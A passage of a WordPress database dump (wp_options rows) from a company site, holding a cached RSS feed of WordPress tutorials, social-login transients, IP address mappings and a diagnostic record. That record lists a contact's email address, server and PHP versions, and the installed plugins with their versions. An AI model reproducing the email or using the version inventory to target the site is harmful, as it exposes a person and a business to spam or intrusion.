Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:81:"https://en.bainternet.info/development-environments-wordcamp-jerusalem-2013/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"7";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:3:"896";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:45:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:39:"Add Taxonomy filter to Custom Post Type";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:67:"https://en.bainternet.info/add-taxonomy-filter-to-custom-post-type/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:76:"https://en.bainternet.info/add-taxonomy-filter-to-custom-post-type/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 10 Feb 2013 07:30:37 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:15:"Fancy Functions";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:6:"How To";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:16:"custom post type";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:15:"custom taxonomy";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:32:"http://en.bainternet.info/?p=872";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1066:"Almost every time I use Custom post types i find myself using a custom taxonomy or two and  lately i found the need of filtering the custom post type posts on the admin edit list by these custom taxonomy and since I don\'t like to write the same code over and over here is a simple class that gets [&#8230;]\n<p><a href="https://en.bainternet.info/add-taxonomy-filter-to-custom-post-type/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/custom-post-type-getting-404-on-permalinks/" rel="bookmark" title="Custom Post type getting 404 on Permalinks">Custom Post type getting 404 on Permalinks </a></li>\n<li><a href="https://en.bainternet.info/custom-taxonomy-template/" rel="bookmark" title="Custom Taxonomy Template">Custom Taxonomy Template </a></li>\n<li><a href="https://en.bainternet.info/conditional-tag-taxonomy-term-and-its-children/" rel="bookmark" title="Conditional tag taxonomy term and its children">Conditional tag taxonomy term and its children </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:72:"https://en.bainternet.info/add-taxonomy-filter-to-custom-post-type/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"23";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:3:"872";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:45:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:32:"WordPress Allow login with email";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:60:"https://en.bainternet.info/wordpress-allow-login-with-email/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:69:"https://en.bainternet.info/wordpress-allow-login-with-email/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 13 Jan 2013 23:21:52 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:15:"Fancy Functions";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:6:"How To";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"functions.php";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:5:"login";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:32:"http://en.bainternet.info/?p=856";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:963:"So a few days ago i was asked how can I allow users to log in with email as well as user name, which seems to be more and more common on membership sites, so here is a quick tip. Code Snippet A simple copy paste in your theme\'s functions.php file would work but you [&#8230;]\n<p><a href="https://en.bainternet.info/wordpress-allow-login-with-email/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/wordpress-easy-login-url-with-no-htaccess/" rel="bookmark" title="WordPress Easy Login URL with no htaccess">WordPress Easy Login URL with no htaccess </a></li>\n<li><a href="https://en.bainternet.info/wordpress-categories-by-year/" rel="bookmark" title="WordPress Categories by year">WordPress Categories by year </a></li>\n<li><a href="https://en.bainternet.info/wordpress-run-once-only/" rel="bookmark" title="WordPress run once only">WordPress run once only </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:65:"https://en.bainternet.info/wordpress-allow-login-with-email/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"23";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:3:"856";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:46:"WordPress Content templates with Shortcodes UI";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:74:"https://en.bainternet.info/wordpress-content-templates-with-shortcodes-ui/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:83:"https://en.bainternet.info/wordpress-content-templates-with-shortcodes-ui/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 03 Jan 2013 22:14:02 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:6:"How To";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:10:"ShortCodes";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:32:"http://en.bainternet.info/?p=840";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:918:"Ever now and then i get a client that asks me how to create WordPress Content templates to make their life easier when they create new posts. So the solution i provide is always the same "use Shortcode UI plugin!" and here is how. Creating Content templates Once you install the plugin: Create a new [&#8230;]\n<p><a href="https://en.bainternet.info/wordpress-content-templates-with-shortcodes-ui/" rel="external nofollow">Source</a></p><div class=\'yarpp-related-rss\'>\n\nRelated posts:<ol>\n<li><a href="https://en.bainternet.info/shortcodes-ui/" rel="bookmark" title="ShortCodes UI">ShortCodes UI </a></li>\n<li><a href="https://en.bainternet.info/show-content-to-user-or-guest-only/" rel="bookmark" title="Show Content to user or guest only">Show Content to user or guest only </a></li>\n<li><a href="https://en.bainternet.info/simple-qr-code/" rel="bookmark" title="Simple QR Code">Simple QR Code </a></li>\n</ol>\n</div>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:8:"Ohad Raz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:79:"https://en.bainternet.info/wordpress-content-templates-with-shortcodes-ui/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"9";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:3:"840";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:4:"href";s:32:"https://en.bainternet.info/feed/";s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:4:"site";a:1:{i:0;a:5:{s:4:"data";s:8:"21563144";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:6:{s:4:"date";s:29:"Fri, 26 May 2017 15:07:25 GMT";s:12:"content-type";s:23:"text/xml; charset=UTF-8";s:10:"x-pingback";s:36:"http://en.bainternet.info/xmlrpc.php";s:16:"content-encoding";s:4:"gzip";s:6:"server";s:16:"cloudflare-nginx";s:6:"cf-ray";s:20:"3651a4de5d690d73-SJC";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (655313, '_transient_timeout_feed_mod_245ea17d5246d467e93fe30ad5f996f9', '1495854446', 'no'); 
INSERT INTO `wp_options` VALUES (655314, '_transient_feed_mod_245ea17d5246d467e93fe30ad5f996f9', '1495811246', 'no'); 
INSERT INTO `wp_options` VALUES (655315, '_transient_timeout_bainternetNews', '1496070446', 'no'); 
INSERT INTO `wp_options` VALUES (655316, '_transient_bainternetNews', '\n				<ul>\n				    				    <li>\n				    	<span>Posted 25 June 2014 | 7:57 am</span><br/>\n				        <a target="_blank" href=\'https://en.bainternet.info/category-order-plugin/\'\n				        title=\'Posted 25 June 2014 | 7:57 am\'>\n				        In category Order Plugin</a>\n				    </li>\n				    				    <li>\n				    	<span>Posted 15 May 2013 | 5:46 pm</span><br/>\n				        <a target="_blank" href=\'https://en.bainternet.info/social-comments-plugin/\'\n				        title=\'Posted 15 May 2013 | 5:46 pm\'>\n				        Social Comments plugin</a>\n				    </li>\n				    				    <li>\n				    	<span>Posted 5 May 2013 | 1:02 pm</span><br/>\n				        <a target="_blank" href=\'https://en.bainternet.info/custom-post-types-columns/\'\n				        title=\'Posted 5 May 2013 | 1:02 pm\'>\n				        Custom Post Types columns</a>\n				    </li>\n				    				    <li>\n				    	<span>Posted 2 May 2013 | 11:15 am</span><br/>\n				        <a target="_blank" href=\'https://en.bainternet.info/my-gsoc-2013-proposal/\'\n				        title=\'Posted 2 May 2013 | 11:15 am\'>\n				        My GSOC 2013 proposal</a>\n				    </li>\n				    				    <li>\n				    	<span>Posted 28 April 2013 | 7:44 am</span><br/>\n				        <a target="_blank" href=\'https://en.bainternet.info/simple-lyteload/\'\n				        title=\'Posted 28 April 2013 | 7:44 am\'>\n				        Simple LyteLoad</a>\n				    </li>\n				    				</ul>\n				', 'no'); 
INSERT INTO `wp_options` VALUES (655320, '_site_transient_timeout_n_nextend5928462caba9c9.71162248', '1495815228', 'no'); 
INSERT INTO `wp_options` VALUES (655321, '_site_transient_n_nextend5928462caba9c9.71162248', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655322, '_site_transient_timeout_nextend5928462caba9c9.71162248_fb_state', '1495815228', 'no'); 
INSERT INTO `wp_options` VALUES (655323, '_site_transient_nextend5928462caba9c9.71162248_fb_state', '959c80656794d29f77c686c8ff5b4fb5', 'no'); 
INSERT INTO `wp_options` VALUES (655324, '_site_transient_timeout_nextend5928462caba9c9.71162248_fb_r', '1495815228', 'no'); 
INSERT INTO `wp_options` VALUES (655325, '_site_transient_nextend5928462caba9c9.71162248_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (655373, '_site_transient_timeout_n_nextend59284f7e3d0c64.43180395', '1495817614', 'no'); 
INSERT INTO `wp_options` VALUES (655374, '_site_transient_n_nextend59284f7e3d0c64.43180395', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655375, '_site_transient_timeout_nextend59284f7e3d0c64.43180395_google_r', '1495817614', 'no'); 
INSERT INTO `wp_options` VALUES (655376, '_site_transient_nextend59284f7e3d0c64.43180395_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (655380, 'taxonomy_term_529', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (655436, '_transient_timeout_external_ip_address_10.150.91.22', '1496420691', 'no'); 
INSERT INTO `wp_options` VALUES (655437, '_transient_external_ip_address_10.150.91.22', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (655520, '_transient_timeout_external_ip_address_10.128.252.109', '1496424033', 'no'); 
INSERT INTO `wp_options` VALUES (655521, '_transient_external_ip_address_10.128.252.109', '503 Over Quota Error &nbsp; Over Quota This application is temporarily over its serving quota. Please try again later.', 'no'); 
INSERT INTO `wp_options` VALUES (655526, '_site_transient_timeout_n_nextend5928642c89b409.85404300', '1495822908', 'no'); 
INSERT INTO `wp_options` VALUES (655527, '_site_transient_n_nextend5928642c89b409.85404300', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655528, '_site_transient_timeout_nextend5928642c89b409.85404300_google_r', '1495822908', 'no'); 
INSERT INTO `wp_options` VALUES (655529, '_site_transient_nextend5928642c89b409.85404300_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (655639, '_site_transient_timeout_n_nextend5928769ec7f802.23249892', '1495827630', 'no'); 
INSERT INTO `wp_options` VALUES (655640, '_site_transient_n_nextend5928769ec7f802.23249892', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655641, '_site_transient_timeout_nextend5928769ec7f802.23249892_fb_state', '1495827630', 'no'); 
INSERT INTO `wp_options` VALUES (655642, '_site_transient_nextend5928769ec7f802.23249892_fb_state', '7f06d38bad9052e53aa974160428252f', 'no'); 
INSERT INTO `wp_options` VALUES (655643, '_site_transient_timeout_nextend5928769ec7f802.23249892_fb_r', '1495827630', 'no'); 
INSERT INTO `wp_options` VALUES (655644, '_site_transient_nextend5928769ec7f802.23249892_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (655670, '_site_transient_timeout_n_nextend59287f56085af3.30176122', '1495829862', 'no'); 
INSERT INTO `wp_options` VALUES (655671, '_site_transient_n_nextend59287f56085af3.30176122', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655672, '_site_transient_timeout_nextend59287f56085af3.30176122_fb_state', '1495829862', 'no'); 
INSERT INTO `wp_options` VALUES (655673, '_site_transient_nextend59287f56085af3.30176122_fb_state', 'ca86c1ca531d07255e42994d8ae158d4', 'no'); 
INSERT INTO `wp_options` VALUES (655674, '_site_transient_timeout_nextend59287f56085af3.30176122_fb_r', '1495829862', 'no'); 
INSERT INTO `wp_options` VALUES (655675, '_site_transient_nextend59287f56085af3.30176122_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (655695, '_site_transient_timeout_n_nextend59288881d96471.90805391', '1495832209', 'no'); 
INSERT INTO `wp_options` VALUES (655696, '_site_transient_n_nextend59288881d96471.90805391', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655697, '_site_transient_timeout_nextend59288881d96471.90805391_fb_state', '1495832209', 'no'); 
INSERT INTO `wp_options` VALUES (655698, '_site_transient_nextend59288881d96471.90805391_fb_state', '09e52b24a503c25e269a00db9ef15b18', 'no'); 
INSERT INTO `wp_options` VALUES (655699, '_site_transient_timeout_nextend59288881d96471.90805391_fb_r', '1495832210', 'no'); 
INSERT INTO `wp_options` VALUES (655700, '_site_transient_nextend59288881d96471.90805391_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (655733, '_transient_timeout_external_ip_address_10.5.107.150', '1496440129', 'no'); 
INSERT INTO `wp_options` VALUES (655734, '_transient_external_ip_address_10.5.107.150', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (655786, '_site_transient_timeout_n_nextend5928ae064b76c9.71877513', '1495841814', 'no'); 
INSERT INTO `wp_options` VALUES (655787, '_site_transient_n_nextend5928ae064b76c9.71877513', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655788, '_site_transient_timeout_nextend5928ae064b76c9.71877513_google_r', '1495841814', 'no'); 
INSERT INTO `wp_options` VALUES (655789, '_site_transient_nextend5928ae064b76c9.71877513_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (655808, '_site_transient_timeout_n_nextend5928bbf19ef629.96457447', '1495845377', 'no'); 
INSERT INTO `wp_options` VALUES (655809, '_site_transient_n_nextend5928bbf19ef629.96457447', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655810, '_site_transient_timeout_nextend5928bbf19ef629.96457447_fb_state', '1495845377', 'no'); 
INSERT INTO `wp_options` VALUES (655811, '_site_transient_nextend5928bbf19ef629.96457447_fb_state', '9648deb364598a66a1c7d0a2bf2fac98', 'no'); 
INSERT INTO `wp_options` VALUES (655812, '_site_transient_timeout_nextend5928bbf19ef629.96457447_fb_r', '1495845377', 'no'); 
INSERT INTO `wp_options` VALUES (655813, '_site_transient_nextend5928bbf19ef629.96457447_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (655860, '_site_transient_timeout_n_nextend5928ea0b3eda97.06984537', '1495857179', 'no'); 
INSERT INTO `wp_options` VALUES (655861, '_site_transient_n_nextend5928ea0b3eda97.06984537', '1', 'no'); 
INSERT INTO `wp_options` VALUES (655862, '_site_transient_timeout_nextend5928ea0b3eda97.06984537_fb_state', '1495857179', 'no'); 
INSERT INTO `wp_options` VALUES (655863, '_site_transient_nextend5928ea0b3eda97.06984537_fb_state', 'b444d47effd9e6c50b7e780996d8f1be', 'no'); 
INSERT INTO `wp_options` VALUES (655864, '_site_transient_timeout_nextend5928ea0b3eda97.06984537_fb_r', '1495857179', 'no'); 
INSERT INTO `wp_options` VALUES (655865, '_site_transient_nextend5928ea0b3eda97.06984537_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (655994, '_transient_timeout_59c0e3c614b32dabbd3cbd89aaa064c7', '1495963970', 'no'); 
INSERT INTO `wp_options` VALUES (655995, '_transient_59c0e3c614b32dabbd3cbd89aaa064c7', 'a:7:{s:4:"name";s:1:" ";s:5:"email";s:20:"ddillulio@mschem.com";s:17:"WordPress Version";s:5:"4.6.1";s:6:"Server";s:122:"<table><tr><td>OS</td><td>Linux</td></tr><tr><td>PHP</td><td>5.5.35</td></tr><tr><td>CURL</td><td>7.38.0</td></tr></table>";s:73:"<a href="https://www.miller-stephenson.com/wp-admin/themes.php">Theme</a>";s:112:"<a href="http://flatsome.uxthemes.com/">Flatsome</a> v3.0.28 by <a href="http://www.uxthemes.com/">UX-Themes</a>";s:76:"<a href="https://www.miller-stephenson.com/wp-admin/plugins.php">Plugins</a>";s:4164:"<i class="icon-close1"></i> <a href="http://www.clogica.com">All 404 Redirect  to Homepage</a> v1.4<br/><i class="icon-close1"></i> <a href="https://servmask.com/">All-in-One WP Migration Unlimited Extension</a> v2.8<br/><i class="icon-close1"></i> <a href="https://servmask.com/">All-in-One WP Migration</a> v5.55<br/><a href="http://alexking.org/projects/wordpress">Articles</a> v1.3<br/><a href="http://betterwp.net/wordpress-plugins/bwp-minify/">Better WordPress Minify</a> v1.3.3<br/><a href="http://www.stillbreathing.co.uk/wordpress/check-email/">Check Email</a> v0.5.5<br/><i class="icon-close1"></i> <a href="http://contactform7.com/">Contact Form 7</a> v4.5.1<br/><i class="icon-close1"></i> <a href="http://wordpress.org/extend/plugins/disable-comments/">Disable Comments</a> v1.5.2<br/><a href="https://wordpress.org/plugins/disable-woocommerce-reviews/">Disable WooCommerce Reviews</a> v1.1<br/><a href="http://w3guy.com">Disclaimer and Notification Manager for Authors</a> v1.0.2<br/><a href="http://sureshopress.com">Display Product for WooCommerce</a> v2.0.18<br/><i class="icon-close1"></i> <a href="http://nextendweb.com/">Nextend Facebook Connect</a> v1.5.9<br/><a href="http://nextendweb.com/">Nextend Google Connect</a> v1.6.1<br/><i class="icon-close1"></i> <a href="http://ninjaforms.com/">Ninja Forms</a> v3.0.24<br/><a href="https://optimus.io">Optimus</a> v1.4.8<br/><a href="http://support.godaddy.com/godaddy/wordpress-p3-plugin/">P3 (Plugin Performance Profiler)</a> v1.5.3.9<br/><a href="">Password Strength for WooCommerce</a> v1.0.1<br/><a href="https://wordpress.org/plugins/pc-google-analytics/">Google Analytics for WordPress</a> v1.1<br/><i class="icon-close1"></i> <a href="https://wisdmlabs.com/">Product Enquiry Pro for WooCommerce (A.K.A QuoteUp)</a> v4.2.0<br/><a href="http://www.viper007bond.com/wordpress-plugins/regenerate-thumbnails/">Regenerate Thumbnails</a> v2.2.6<br/><i class="icon-close1"></i> <a href="http://www.schloebe.de/wordpress/reveal-ids-for-wp-admin-25-plugin/">Reveal IDs</a> v1.4.6.2<br/><i class="icon-close1"></i> <a href="https://wordpress.org/plugins/search-and-replace/">Search &amp; Replace</a> v3.1.0<br/><a href="http://infolific.com/technology/software-worth-using/show-hide-author-in-wordpress/">Show Hide Author</a> v2.3<br/><a href="http://sidecar.tv/decision_tree">Decision Tree</a> v1.1<br/><i class="icon-close1"></i> <a href="http://wordpress.org/extend/plugins/social-media-widget/">Social Media Widget</a> v4.0.5<br/><i class="icon-close1"></i> <a href="http://ultimatelysocial.com">Ultimate Social Media PLUS</a> v2.5.1<br/><a href="https://github.com/Jarlskov/google-analytics-url-builder">URL Builder for Analytics</a> v1.1.2<br/><a href="http://en.bainternet.info">User Specific Content</a> v1.0.6<br/><a href="http://www.wpbackoffice.com/plugins/woocommerce-category-banner/">WooCommerce Category Banner</a> v1.1.2<br/><i class="icon-close1"></i> <a href="http://allaerd.org/">Woocommerce CSV Import</a> v3.3.0<br/><i class="icon-close1"></i> <a href="https://woocommerce.com/">WooCommerce</a> v2.6.11<br/><a href="http://woothemes.com/woosidebars/">WooSidebars</a> v1.4.3<br/><a href="http://www.mertyazicioglu.com/wordpress-move/">WordPress Move</a> v1.3.2<br/><i class="icon-close1"></i> <a href="https://yoast.com/wordpress/plugins/seo/#utm_source=wpadmin&#038;utm_medium=plugin&#038;utm_campaign=wpseoplugin">Yoast SEO Premium</a> v4.1<br/><a href="http://www.callum-macdonald.com/code/wp-mail-smtp/">WP-Mail-SMTP</a> v0.10.1<br/><i class="icon-close1"></i> <a href="http://wpengine.com">WP Engine Automated Migration</a> v1.45<br/><i class="icon-close1"></i> <a href="https://wordpress.org/plugins/wp-super-cache/">WP Super Cache</a> v1.4.8<br/><i 